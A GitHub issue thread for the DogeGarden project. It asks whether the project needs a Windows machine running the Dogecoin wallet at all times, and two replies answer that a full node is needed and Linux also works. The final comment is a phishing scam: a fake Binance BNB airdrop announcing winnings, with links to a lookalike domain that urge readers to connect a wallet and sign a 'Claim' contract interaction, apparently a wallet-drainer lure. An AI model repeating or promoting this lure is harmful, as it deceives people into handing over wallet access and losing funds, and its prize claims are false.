### ISSUE TITLE
question

### ISSUE THREAD

**Issue by pvnfu** [qlpqlp/DogeGarden#2]
Does this require a windows computer running the Dogecoin wallet to be turned on at all times AND a server running the site? I don't know if I got it right by reading the first installation step

**Comment by Adkdotdoge** [comment]
Correct. The dogecoin full node does have to be running for this build. 
Checkout his new project HappyShibe using Libdogecoin  and does not require running a full node.

**Comment by qlpqlp** [comment]
> Does this require a windows computer running the Dogecoin wallet to be turned on at all times AND a server running the site? I don't know if I got it right by reading the first installation step

Sorry the really late reply.
No it does not require a Windows computer, can run also on a linux computer. It needs Dogecoin Core Wallet for now, in the future will be simplified to not require a node :)

**Comment by mzm-alanfong** [comment]
# $BNB Airdrop Guide: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.000k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @barrigabitcoin, @lastzero, @ccronca, @Ninja5tyl3, @HamsterQuest, @hunj, @bhaltair
